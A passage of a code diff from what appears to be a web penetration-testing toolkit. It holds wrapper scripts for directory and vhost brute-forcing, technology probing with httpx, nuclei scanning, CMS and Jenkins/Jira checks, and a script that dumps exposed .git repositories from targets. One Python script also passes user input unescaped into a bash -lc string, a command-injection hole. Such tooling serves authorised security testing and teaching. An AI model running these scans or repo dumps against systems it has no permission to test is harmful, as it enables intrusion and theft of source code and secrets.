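def classify_cors(acao: str, acac: str, origin: str) -> str:
    """Classify a CORS response the way the checks above do."""
    if acao == '*' and acac.lower() == 'true':
        return 'dangerous'   # wildcard origin with credentials allowed
    if acao == origin:
        return 'reflected'   # attacker-supplied Origin echoed back
    return 'ok'

print(classify_cors('*', 'true', 'https://evil.example'))                     # dangerous
print(classify_cors('https://evil.example', '', 'https://evil.example'))      # reflected
print(classify_cors('https://app.example', 'true', 'https://evil.example'))   # ok
```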

bin/web/crawl_words.py Executable file

@@ -0,0 +1,46 @@
#!/usr/bin/env python3
import sys, re, html, urllib.parse, urllib.request
def fetch(url):
try:
req = urllib.request.Request(url, headers={'User-Agent':'Mozilla/5.0'})
with urllib.request.urlopen(req, timeout=8) as r:
return r.read().decode('utf-8', 'ignore')
except Exception as e:
sys.stderr.write(f"[!] fetch error for {url}: {e}\n")
return ''
def extract_links(base, htmltext):
links = set()
for m in re.finditer(r'href=["\']([^"\']+)["\']', htmltext, re.I):
href = m.group(1)
if href.startswith('#') or href.startswith('mailto:'): continue
url = urllib.parse.urljoin(base, href)
links.add(url)
return links
def words(text):
text = html.unescape(text)
return set(w.lower() for w in re.findall(r'[A-Za-z][A-Za-z0-9_\-]{3,}', text))
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <url> [depth]", file=sys.stderr); sys.exit(1)
start = sys.argv[1]
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 1
visited=set([start]); frontier=[start]
all_words=set()
for _ in range(depth):
new=[]
for u in list(frontier):
body = fetch(u)
all_words |= words(body)
for v in extract_links(u, body):
if v not in visited and urllib.parse.urlparse(v).netloc == urllib.parse.urlparse(start).netloc:
visited.add(v); new.append(v)
frontier = new
for w in sorted(all_words):
print(w)
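Token extraction in `words()` is the heart of the generated wordlist: HTML-unescape the page, then keep runs of four or more word characters that start with a letter, lowercased. A self-contained sketch on fabricated markup:

```python
import re, html

def words(text):
    # Same token rule as crawl_words.py: a letter followed by at least
    # three more of [A-Za-z0-9_-], lowercased and deduplicated.
    text = html.unescape(text)
    return set(w.lower() for w in re.findall(r'[A-Za-z][A-Za-z0-9_\-]{3,}', text))

sample = '<p>Login to the Admin-Panel &amp; read FAQ v2.0</p>'
print(sorted(words(sample)))  # ['admin-panel', 'login', 'read']
```

Short tokens like `FAQ` and `v2.0` are dropped by design: tokens under four characters add noise to directory brute-forcing.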

bin/web/dirbuster.sh Executable file

@@ -0,0 +1,27 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <url> [wordlist] [exts]
url e.g. http://10.10.10.10/
wordlist default: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
  exts      comma ext list (with dots; ffuf appends them literally), default: .php,.txt,.conf,.bak,.old,.zip,.tar.gz,.7z
  Requires: ffuf
USAGE
exit 1
}
url=${1:-}
[[ -z "$url" ]] && usage
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt}
exts=${3:-.php,.txt,.conf,.bak,.old,.zip,.tar.gz,.7z}
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/ffuf_$(echo -n "$url" | tr '/:' '__')_${ts}"
ffuf -u "$url"/FUZZ -w "$wordlist" -e "$exts" -mc all -fc 404 -recursion -recursion-depth 2 -t 50 -of csv -o "$base.csv" 2>&1 | tee "$base.log"
echo "[+] Results saved to $base.csv"
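The output naming above flattens the target URL into a filesystem-safe token by mapping `/` and `:` to `_`; a one-line sketch of that step (the `sanitize` name is ours):

```shell
# Mirror of the naming step: URL -> safe filename fragment.
sanitize() { printf %s "$1" | tr '/:' '__'; }

sanitize "http://10.10.10.10/"; echo   # http___10.10.10.10_
```

Combined with the timestamp suffix, this keeps repeated scans of the same target from clobbering each other.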

bin/web/droopescan_quick.sh Executable file

@@ -0,0 +1,14 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> (requires droopescan)" >&2; exit 1; }
if ! command -v droopescan >/dev/null 2>&1; then echo "[!] droopescan not found" >&2; exit 2; fi
# Detect CMS via droopescan auto if available; fallback to drupal scan
if droopescan scan --help 2>&1 | grep -q "auto"; then
exec droopescan scan auto -u "$url"
else
exec droopescan scan drupal -u "$url"
fi

bin/web/git_dumper.sh Executable file

@@ -0,0 +1,22 @@
#!/usr/bin/env bash
set -euo pipefail
base=${1:-}
out=${2:-gitdump}
[[ -z "$base" ]] && { echo "Usage: $(basename "$0") <base-url> [outdir]" >&2; exit 1; }
mkdir -p "$out/.git"
cd "$out"
echo "[+] Attempting to mirror .git from $base"
wget -q --no-host-directories --cut-dirs=0 -r -np -nH -R "index.html*" "${base%/}/.git/" || true
if [[ -f .git/HEAD ]]; then
echo "[+] Found .git directory. Trying to restore working tree."
git init >/dev/null 2>&1 || true
git reset --hard >/dev/null 2>&1 || true
echo "[+] Done. Inspect repo at: $(pwd)"
else
echo "[!] .git not accessible or download failed."
fi
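The restore step works because a complete `.git` directory contains everything needed to rebuild the working tree; a disposable demo of the same `git reset --hard` recovery (temp repo, fabricated file names):

```shell
tmp=$(mktemp -d)
cd "$tmp"
git init -q repo && cd repo
echo secret > flag.txt
git add flag.txt
git -c user.email=a@b.c -c user.name=demo commit -qm init
rm flag.txt            # simulate having only the dumped .git, no working tree
git reset --hard -q    # rebuilds flag.txt from .git, as git_dumper.sh does
cat flag.txt           # secret
```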

bin/web/gobuster_dir.sh Executable file

@@ -0,0 +1,16 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt}
exts=${3:-php,txt,conf,bak,old,zip,tar.gz}
threads=${4:-50}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url> [wordlist] [exts] [threads] (requires gobuster)" >&2; exit 1; }
if ! command -v gobuster >/dev/null 2>&1; then
echo "[!] gobuster not found. Install gobuster." >&2
exit 2
fi
gobuster dir -u "$url" -w "$wordlist" -x "$exts" -t "$threads" -k -e -q

bin/web/gobuster_vhost.sh Executable file

@@ -0,0 +1,11 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
wordlist=${2:-/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt}
threads=${3:-50}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <base-url> [wordlist] [threads] (requires gobuster)" >&2; exit 1; }
command -v gobuster >/dev/null 2>&1 || { echo "[!] gobuster not found" >&2; exit 2; }
exec gobuster vhost -u "$url" -w "$wordlist" -t "$threads" -k -q

bin/web/http_headers.sh Executable file

@@ -0,0 +1,6 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <url>" >&2; exit 1; }
curl -skI -m 10 "$url"

bin/web/httpx_presets.sh Executable file

@@ -0,0 +1,23 @@
#!/usr/bin/env bash
set -euo pipefail
profile=${1:-balanced}
input=${2:-}
[[ -z "$input" ]] && { echo "Usage: $(basename "$0") <profile: slow|balanced|aggressive> <host|file> [extra httpx flags]" >&2; exit 1; }
shift 2 || true
if ! command -v httpx >/dev/null 2>&1; then echo "[!] httpx not found" >&2; exit 2; fi
case "$profile" in
slow) rate=50; timeout=10; retries=3; threads=25;;
balanced) rate=300; timeout=7; retries=2; threads=50;;
  aggressive) rate=1200; timeout=5; retries=1; threads=150;;
*) echo "[!] Unknown profile" >&2; exit 1;;
esac
if [[ -f "$input" ]]; then
exec httpx -silent -l "$input" -rate "$rate" -timeout "$timeout" -retries "$retries" -threads "$threads" -status-code -title -tech-detect "$@"
else
printf "%s\n" "$input" | httpx -silent -rate "$rate" -timeout "$timeout" -retries "$retries" -threads "$threads" -status-code -title -tech-detect "$@"
fi

bin/web/httpx_probe.sh Executable file

@@ -0,0 +1,18 @@
#!/usr/bin/env bash
set -euo pipefail
input=${1:-}
[[ -z "$input" ]] && { echo "Usage: $(basename "$0") <host|file> [extra httpx flags]" >&2; exit 1; }
shift || true
if ! command -v httpx >/dev/null 2>&1; then
echo "[!] httpx not found. Install httpx (projectdiscovery)." >&2
exit 2
fi
if [[ -f "$input" ]]; then
exec httpx -silent -l "$input" -status-code -title -tech-detect -asn -ip -hash -server "$@"
else
printf "%s\n" "$input" | httpx -silent -status-code -title -tech-detect -asn -ip -hash -server "$@"
fi

bin/web/httpx_tech_route.py Executable file

@@ -0,0 +1,134 @@
#!/usr/bin/env python3
import sys, os, json, subprocess, tempfile
HELP = """Usage: httpx_tech_route.py <host|file> [--tech list] [--severity sevlist] [--wpscan] [--wpscan-limit N] [--extra] [--extra-limit N] [--dry-run]
Runs httpx -json -tech-detect, groups URLs by technologies, and runs nuclei per tech presets.
Tech presets map:
wordpress -> nuclei tags: wordpress (+ optional wpscan_quick)
drupal, joomla, laravel, aspnet, spring, tomcat, iis, exchange, sharepoint, grafana, kibana, gitlab, confluence, jupyter -> nuclei tag same as tech
"""
if len(sys.argv) < 2:
print(HELP, file=sys.stderr); sys.exit(1)
arg = sys.argv[1]
dry = '--dry-run' in sys.argv
tech_filter = None
severity = 'medium,high,critical'
wpscan = '--wpscan' in sys.argv
wpscan_limit = 5
extra = '--extra' in sys.argv
extra_limit = 5
if '--tech' in sys.argv:
i = sys.argv.index('--tech')
if i+1 < len(sys.argv): tech_filter = set(sys.argv[i+1].lower().split(','))
if '--severity' in sys.argv:
i = sys.argv.index('--severity')
if i+1 < len(sys.argv): severity = sys.argv[i+1]
if '--wpscan-limit' in sys.argv:
i = sys.argv.index('--wpscan-limit')
if i+1 < len(sys.argv): wpscan_limit = int(sys.argv[i+1])
if '--extra-limit' in sys.argv:
i = sys.argv.index('--extra-limit')
if i+1 < len(sys.argv): extra_limit = int(sys.argv[i+1])
def run(cmd):
try:
return subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode()
except Exception:
return ''
import shutil
if not shutil.which('httpx'):
print('[!] httpx not found', file=sys.stderr); sys.exit(2)
if not shutil.which('nuclei') and not dry:
print('[!] nuclei not found', file=sys.stderr); sys.exit(2)
json_lines = ''
if os.path.isfile(arg):
json_lines = run(['httpx','-silent','-l',arg,'-ports','80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000','-tech-detect','-json'])
else:
json_lines = run(['bash','-lc',f'printf "%s\\n" "{arg}" | httpx -silent -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -tech-detect -json'])
by_tech = {}
for line in json_lines.splitlines():
try:
o = json.loads(line)
url = o.get('url')
techs = [t.lower() for t in o.get('technologies', [])]
for t in techs:
if tech_filter and t not in tech_filter: continue
by_tech.setdefault(t, set()).add(url)
except Exception:
continue
presets = {
'wordpress': {'tags': 'wordpress', 'wpscan': True},
'drupal': {'tags': 'drupal'},
'joomla': {'tags': 'joomla'},
'laravel': {'tags': 'laravel'},
'aspnet': {'tags': 'aspnet'},
'spring': {'tags': 'spring'},
'tomcat': {'tags': 'tomcat'},
'iis': {'tags': 'iis'},
'exchange': {'tags': 'exchange'},
'sharepoint': {'tags': 'sharepoint'},
'grafana': {'tags': 'grafana'},
'kibana': {'tags': 'kibana'},
'gitlab': {'tags': 'gitlab'},
'confluence': {'tags': 'confluence'},
'jupyter': {'tags': 'jupyter'},
'jenkins': {'tags': 'jenkins'},
'magento': {'tags': 'magento'},
'sonarqube': {'tags': 'sonarqube'},
}
for t, urls in sorted(by_tech.items(), key=lambda x: (-len(x[1]), x[0])):
if not urls: continue
print(f"[+] Tech: {t} ({len(urls)} urls)")
tf = tempfile.NamedTemporaryFile(delete=False, mode='w')
for u in sorted(urls): tf.write(u+'\n')
tf.close()
tag = presets.get(t, {'tags': t}).get('tags', t)
if dry:
print(f"nuclei -l {tf.name} -tags {tag} -severity {severity} -o {os.environ.get('OUTDIR','scans')}/nuclei_{t}.txt -silent")
else:
outdir = os.environ.get('OUTDIR','scans')
os.makedirs(outdir, exist_ok=True)
out = os.path.join(outdir, f'nuclei_{t}.txt')
subprocess.call(['nuclei','-l',tf.name,'-tags',tag,'-severity',severity,'-o',out,'-silent'])
print(f" nuclei -> {out}")
# Optional WordPress scan
if t == 'wordpress' and wpscan and shutil.which('wpscan') and not dry:
limit = 0
with open(tf.name,'r') as f:
for line in f:
u = line.strip()
if not u: continue
subprocess.call(['bin/web/wpscan_quick.sh', u])
limit += 1
if limit >= wpscan_limit: break
# Optional extra tech-specific quick wrappers
if extra and not dry:
limit = 0
with open(tf.name,'r') as f:
for line in f:
u = line.strip()
if not u: continue
if t == 'drupal' and shutil.which('droopescan'):
subprocess.call(['bin/web/droopescan_quick.sh', u])
elif t == 'joomla' and shutil.which('joomscan'):
subprocess.call(['bin/web/joomscan_quick.sh', u])
elif t == 'jenkins':
subprocess.call(['bin/web/jenkins_quick.sh', u])
elif t == 'sonarqube':
subprocess.call(['bin/web/sonarqube_quick.sh', u])
elif t == 'magento':
subprocess.call(['bin/web/magento_quick.sh', u])
elif t == 'jira':
subprocess.call(['bin/web/jira_quick.sh', u])
elif t == 'confluence':
subprocess.call(['bin/web/confluence_quick.sh', u])
limit += 1
if limit >= extra_limit: break
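The grouping step above can be exercised offline with canned httpx JSON lines: technologies are lowercased, URLs are bucketed per tech, and malformed lines are silently skipped. A sketch on fabricated sample data:

```python
import json

lines = '\n'.join([
    json.dumps({'url': 'http://a.example', 'technologies': ['WordPress', 'PHP']}),
    json.dumps({'url': 'http://b.example', 'technologies': ['WordPress']}),
    'not json',  # malformed lines are skipped, as in the script
])

by_tech = {}
for line in lines.splitlines():
    try:
        o = json.loads(line)
        for t in [t.lower() for t in o.get('technologies', [])]:
            by_tech.setdefault(t, set()).add(o.get('url'))
    except Exception:
        continue

# Sorted most-seen tech first, then alphabetically, like the routing loop.
for t, urls in sorted(by_tech.items(), key=lambda x: (-len(x[1]), x[0])):
    print(t, len(urls))
```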

bin/web/httpx_to_nuclei.sh Executable file

@@ -0,0 +1,99 @@
#!/usr/bin/env bash
set -euo pipefail
usage(){
cat >&2 <<USAGE
Usage: $(basename "$0") <host|file> [--severity auto|crit|high|med|low] [--tags <tags>]
Pipeline: httpx (alive URLs) -> nuclei (selected severities/tags). Saves outputs in OUTDIR.
USAGE
exit 1
}
input=${1:-}
[[ -z "$input" ]] && usage
shift || true
sev=auto
tags=${NUCLEI_TAGS:-cves,exposures,misconfig}
while [[ $# -gt 0 ]]; do
case "$1" in
--severity) sev=${2:-auto}; shift 2;;
--tags) tags=${2:-$tags}; shift 2;;
*) echo "[!] Unknown arg: $1" >&2; shift;;
esac
done
command -v httpx >/dev/null 2>&1 || { echo "[!] httpx not found" >&2; exit 2; }
command -v nuclei >/dev/null 2>&1 || { echo "[!] nuclei not found" >&2; exit 2; }
outdir=${OUTDIR:-scans}
mkdir -p "$outdir"
ts=$(date +%Y%m%d_%H%M%S)
base="$outdir/httpx2nuclei_${ts}"
mkdir -p "$base"
# Probe
if [[ -f "$input" ]]; then
httpx -silent -l "$input" -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -json > "$base/httpx.json"
else
printf "%s\n" "$input" | httpx -silent -ports 80,81,88,443,3000,5000,7001,7002,8000,8008,8080,8081,8088,8443,8888,9000 -status-code -title -tech-detect -json > "$base/httpx.json"
fi
# Extract URLs
python3 - "$base/httpx.json" > "$base/urls.txt" <<'PY'
import sys, json
urls=set()
with open(sys.argv[1], 'r', errors='ignore') as f:
for line in f:
try:
o=json.loads(line)
u=o.get('url') or o.get('host')
if u: urls.add(u)
except Exception: pass
for u in sorted(urls): print(u)
PY
count=$(wc -l < "$base/urls.txt" | tr -d ' ')
echo "[+] Alive URLs: $count (saved to $base/urls.txt)"
# Auto severity selection
case "$sev" in
auto)
if [[ "$count" -gt 500 ]]; then severity=high,critical
elif [[ "$count" -gt 100 ]]; then severity=medium,high,critical
else severity=low,medium,high,critical
fi
;;
crit) severity=critical;;
high) severity=high,critical;;
med) severity=medium,high,critical;;
low) severity=low,medium,high,critical;;
*) severity=$sev;;
esac
echo "$severity" > "$base/severity.txt"
echo "[+] Nuclei severity: $severity; tags: $tags"
if [[ "$count" -gt 0 ]]; then
nuclei -l "$base/urls.txt" -tags "$tags" -severity "$severity" -o "$base/nuclei.txt" -silent || true
nuclei -l "$base/urls.txt" -tags "$tags" -severity "$severity" -json -o "$base/nuclei.json" -silent || true
# Summarize JSON by severity
if [[ -s "$base/nuclei.json" ]]; then
python3 - "$base/nuclei.json" > "$base/summary.json" <<'PY'
import sys, json, collections
sev=collections.Counter(); total=0
with open(sys.argv[1],'r',errors='ignore') as f:
for line in f:
try:
o=json.loads(line); total+=1; sev[(o.get('info') or {}).get('severity','unknown').lower()]+=1
except Exception: pass
print(json.dumps({'total': total, 'by_severity': dict(sev)}, indent=2))
PY
echo "NUCLEI_JSON: $base/nuclei.json"
echo "NUCLEI_SUMMARY: $base/summary.json"
fi
echo "[+] Nuclei output: $base/nuclei.txt"
else
echo "[!] No URLs to scan with nuclei"
fi
echo "[+] Pipeline completed. Base dir: $base"
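The auto tier above scales nuclei severity down as the target set grows, trading coverage for runtime on large scopes. The thresholds as a standalone sketch (the `pick_severity` name is ours):

```shell
# >500 URLs: only high/critical; >100: medium and up; otherwise low and up.
pick_severity() {
  count=$1
  if [ "$count" -gt 500 ]; then echo high,critical
  elif [ "$count" -gt 100 ]; then echo medium,high,critical
  else echo low,medium,high,critical
  fi
}

pick_severity 42     # low,medium,high,critical
pick_severity 101    # medium,high,critical
pick_severity 1000   # high,critical
```

The boundaries are exclusive: exactly 100 or 500 URLs still gets the broader tier.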

bin/web/jenkins_quick.sh Executable file

@@ -0,0 +1,10 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <jenkins-url>" >&2; exit 1; }
echo "[+] Jenkins quick checks for $url"
curl -sk "$url/api/json" | head -c 200 | sed 's/.*/[api] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true
curl -sk "$url/crumbIssuer/api/json" | head -c 200 | sed 's/.*/[crumb] &/' || true
curl -sk "$url/whoAmI/api/json" | head -c 200 | sed 's/.*/[whoami] &/' || true

bin/web/jira_quick.sh Executable file

@@ -0,0 +1,9 @@
#!/usr/bin/env bash
set -euo pipefail
url=${1:-}
[[ -z "$url" ]] && { echo "Usage: $(basename "$0") <jira-url>" >&2; exit 1; }
echo "[+] Jira quick checks for $url"
curl -sk "$url/secure/Dashboard.jspa" | head -c 200 | sed 's/.*/[dash] &/' || true
curl -sk "$url/rest/api/latest/serverInfo" | sed 's/.*/[api] &/' || true
curl -sk -I "$url/" | sed -n '1,20p' | sed 's/.*/[hdr] &/' || true

Some files were not shown because too many files have changed in this diff.